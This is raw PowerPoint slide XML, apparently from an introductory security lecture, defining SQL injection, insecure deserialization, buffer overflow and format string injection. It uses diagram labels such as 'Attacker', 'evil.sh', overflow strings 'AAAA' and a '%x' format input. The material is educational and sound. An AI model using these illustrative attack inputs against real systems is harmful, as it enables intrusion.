              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{160B9BF7-919B-5E48-BD95-2254B60308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2196" t="2810" r="2087" b="69375"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084041" y="2427959"/>
            <a:ext cx="516151" cy="645437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B041B1-2741-6547-92D0-CA91B39733A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6003305" y="3002990"/>
            <a:ext cx="677621" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D9F0C0E-6A15-D142-AC78-44D43BDF8531}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6146171" y="2644969"/>
            <a:ext cx="356991" cy="325677"/>
            <a:chOff x="7809979" y="3941589"/>
            <a:chExt cx="356991" cy="325677"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Connector 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50638C96-E54B-B541-AB6D-D146A8719848}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7809979" y="3941589"/>
              <a:ext cx="356991" cy="325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0C55E6-7631-FB4E-82DA-47AB39B6999F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7809979" y="3941589"/>
              <a:ext cx="356991" cy="3256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9B068D-CF57-8645-B4D7-646C19CAAA4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7702800" y="1534237"/>
            <a:ext cx="3640910" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="3600" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>SQL Injection allows attackers to insert arbitrary database commands.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184028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699046" y="284146"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure Deserialization</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723746" y="1567361"/>
            <a:ext cx="1371683" cy="166642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2037493" y="4613935"/>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0"/>
            <a:endCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2276779" y="3481127"/>
            <a:ext cx="1380148" cy="885469"/>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69CB740-A901-5543-BDCD-476BE2ED9A79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2806922" y="1240377"/>
            <a:ext cx="1205330" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Book Store</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Graphic 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA788ECB-1243-7D45-8C39-4DDBC64325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88035" y="2468462"/>
            <a:ext cx="481538" cy="494646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Rectangle 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E64D24A-A263-2B47-9840-83D81685C37D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9462347" y="2971520"/>
            <a:ext cx="1565654" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;_ evil.sh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="Graphic 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0923061-8275-6746-BBFC-83A9C2E1D3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6493" y="3782554"/>
            <a:ext cx="574890" cy="574890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{721DF1C7-EBA2-D743-BCF8-4F3D3CC427E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3902535" y="4389593"/>
            <a:ext cx="1467068" cy="1503826"/>
            <a:chOff x="1345136" y="3444526"/>
            <a:chExt cx="1467068" cy="1503826"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Graphic 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B122F76F-F9BA-5441-A3B1-F0B9F3D9C4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5136" y="3444526"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Graphic 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BBAFDB9-FAD4-0A43-AF69-9B02F9976F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0575" y="3627856"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="TextBox 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93433081-5A63-BC4B-9B6D-9651E5A49B4B}"/>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8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{525C85E3-28AC-224D-A834-9B429D7C2297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380195" y="4389536"/>
            <a:ext cx="1152880" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Curved Connector 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E1A5538-F591-B747-B811-49D8FA8FB749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="25" idx="0"/>
            <a:endCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="3316284" y="3327091"/>
            <a:ext cx="1155806" cy="969197"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="35000"/>
                <a:alpha val="56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76D4CE3-4BEB-D240-BCC9-392C35D467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54048" y="3549830"/>
            <a:ext cx="872851" cy="872851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C27D80FF-70FD-DF41-943A-5F146FAE669C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4946269" y="4323189"/>
            <a:ext cx="803425" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Book </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAEC2F28-16D7-0A41-B47A-3516E8DDB345}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6257082" y="1266388"/>
            <a:ext cx="4559808" cy="4832092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>Deserialization attacks target applications that accept objects in binary or text format. For the attack to be possible, the application must reference unsafe classes that execute code when deserialized in the program memory. Unfortunately many commonly used 3rd party libraries include such classes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170090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8021-F5A3-7A4B-A1E4-91669ECE384E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261290" y="417074"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3668B87-6FBE-DE42-A6BA-834C1B23918A}"/>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3672631" y="1894246"/>
            <a:ext cx="2026712" cy="2462206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C38FC0AF-91A6-3C40-877E-CCEF69A30155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1328982" y="2649099"/>
            <a:ext cx="1050542" cy="1279484"/>
            <a:chOff x="1267225" y="4514012"/>
            <a:chExt cx="1050542" cy="1279484"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Graphic 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8946F9A6-DF3D-E840-93F6-FB4FE5FFB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75AE18CF-923F-B14E-8685-05A6FEB55251}"/>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11" name="Curved Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A69D79DD-5599-A14B-B897-D12006D7ADBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2291858" y="3125349"/>
            <a:ext cx="1380773" cy="12700"/>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52B0A7-4E83-6845-AEB8-5AD5259F7D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217508" y="2702558"/>
            <a:ext cx="1088760" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAAA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C69CB740-A901-5543-BDCD-476BE2ED9A79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4091002" y="1530769"/>
            <a:ext cx="980910" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6E8417B-6E8F-C948-869E-EB06451FECDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4095178" y="2500933"/>
            <a:ext cx="1059906" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>b = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i!\0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4307CD83-0DEE-C947-994D-536E7F61A4E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6132995" y="1530769"/>
            <a:ext cx="5415877" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>Buffer Overflow allows attackers to cross variable boundaries and alter program data and even instructions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268639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14DE-F880-8F46-8A33-20B48514FC3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1232770" y="572571"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Format String Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14CBEDEA-D3D7-7649-9B73-CB3D6A2D7435}"/>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2962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2762244" y="1921995"/>
            <a:ext cx="2026712" cy="2462206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FB2EBA0-4D4B-7D4F-82C1-633447B85343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1061187" y="2640368"/>
            <a:ext cx="1050542" cy="1279484"/>
            <a:chOff x="1267225" y="4514012"/>
            <a:chExt cx="1050542" cy="1279484"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Graphic 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23D8AAA1-B068-2F40-B76F-2CFF92F92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601" y="4514012"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCAEA66F-F158-464B-9277-24D46AC0562A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1267225" y="5424164"/>
              <a:ext cx="1050542" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Curved Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB28343D-B571-C541-B65B-F510DBCE06BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2024063" y="3111297"/>
            <a:ext cx="967670" cy="5321"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="C00000">
                <a:alpha val="56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A3458D-13E5-994D-9E89-E52D9F647BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2220704" y="2760241"/>
            <a:ext cx="449162" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0CED6C8-88B1-A34F-88F1-4993933EC112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3296140" y="1640089"/>
            <a:ext cx="980910" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
